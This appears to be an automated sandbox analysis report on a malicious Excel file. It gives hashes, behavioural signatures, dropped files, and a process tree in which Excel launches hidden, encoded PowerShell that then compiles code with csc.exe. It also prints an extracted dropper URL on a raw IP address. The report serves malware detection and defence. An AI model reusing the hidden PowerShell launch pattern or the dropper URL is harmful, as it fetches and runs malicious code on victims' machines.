Analysis

  • max time kernel: 33s
  • max time network: 36s
  • platform: windows10-2004_x64
  • resource: win10v2004-20241007-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 13-11-2024 21:48

General

  • Target: 4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f.xls
  • Size: 46KB
  • MD5: a577d04005ded2c2a765cf59ab347508
  • SHA1: 9467b968e5ea5bf2d8b05f10ef11a2eab28cd29c
  • SHA256: 4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f
  • SHA512: 357aa26a6712dc5cc40c0854704098b3c373572c5efc01b73ebd047581c29133d26f6f0204373a83028384bd9e9411ad5420bcb99005b839ed7f9493292dadad
  • SSDEEP: 768:s4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:XSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score: 10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs
    • ps1.dropper: https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process (1 IoC)

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request (1 IoC)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)

    Runs PowerShell with the display window hidden.

  • Checks processor information in registry (2 TTPs, 3 IoCs)

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry (2 TTPs, 3 IoCs)
  • Suspicious behavior: AddClipboardFormatListener (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of SetWindowsHookEx (14 IoCs)
  • Suspicious use of WriteProcessMemory (6 IoCs)

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc 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
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4268
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4812
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2268.tmp" "c:\Users\Admin\AppData\Local\Temp\5sljfrdp\CSC60297B08AA304B0F96162B44A9442652.TMP"
          4⤵
          PID:372

Downloads

  • C:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.dll
    Filesize: 3KB
    MD5: b867c862644547520312c4bf29fc946f
    SHA1: 869cdc4cc9bcc87c1112d6f487d11d8e7c693ee3
    SHA256: 6a5026cc589b8ca5db702fb8976a3daba5a94bf1ed1de8c8fd0cb7dc898fc707
    SHA512: dccacf6de7b90e546507e9afd5ea17413d038bbd25348737a66bb8792d0c076f4ae71c1ae30c67449aac55407a9a12b29ddf34a618bc8481c7ad91fc427f079f

  • C:\Users\Admin\AppData\Local\Temp\RES2268.tmp
    Filesize: 1KB
    MD5: ae0ec87d0780cd281b85f0dab6d10796
    SHA1: 3d387c55123665f172ed50443d3cab4b54928ba6
    SHA256: ab806d1372e5bb560a0ebf693dc5315462aee75c80c097ca71e53c2e6370508d
    SHA512: 3dc063df5e42e386f4d702c39e791cc414301e80f02ce6a64e3d07b2ac90acd53415ab3d2b79c9ae521d8b0bb3e7513df26e630a81cd37480861c022468f3781

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sgj0fima.qj1.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
    Filesize: 1KB
    MD5: b78d36311a167ef513f6ed277b7929a0
    SHA1: 212dade9bf9fe79bdc92e77e56c3ea410cafc3b2
    SHA256: 3a56e0a4c14aaf0270f6871e6490a12696c233cd0bae0b7dfdd841e81ba1b811
    SHA512: 93f0d8b49d7a3570fedfe0917d6a4515584000f794270fd47fd23c83d6b0e4bebf083867ec0b2f8bd6fc1da6e403b31ee76b71213b7fdd173b20353c02c12445

  • \??\c:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.0.cs
    Filesize: 631B
    MD5: f4dd5c682eb7b3b679f084261bfc7c4c
    SHA1: 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
    SHA256: 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
    SHA512: 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

  • \??\c:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.cmdline
    Filesize: 369B
    MD5: 31010d98ce65c8ce58a910cb6d823e17
    SHA1: 2101cd82911e30ad13c4c9ffb05bb12c823ca2c0
    SHA256: fd2188309eb3acdbbb86e2bdc9ac56fb845618b134fc98d7b8e5cc807b7a9548
    SHA512: f4ed598bd84524f0b7660d2d496da81bf15809332214a5ae4617a297ee7af5007a6ee8937a7aaaf13b33f91001797638ba20def87f4eb9b0c6f4bbc9e77330be

  • \??\c:\Users\Admin\AppData\Local\Temp\5sljfrdp\CSC60297B08AA304B0F96162B44A9442652.TMP
    Filesize: 652B
    MD5: 1618c0fb414adfdc0e55f10fe3220dc8
    SHA1: 219e4cd8c6ead6029e5c6180d1b700f4f2bf2e36
    SHA256: fc3c058707372dc8f51aa038d8fd9c62281ae6cf372416cef1b88825a4e4dd59
    SHA512: e57871058d39da751bf8092191a865ec2f32f71f625f3d9a3c8f9594ec88730b7f975a88869636c4d63c2f7d5ad0b1fa9226adb1ea77246cfaffcacc433dbc3a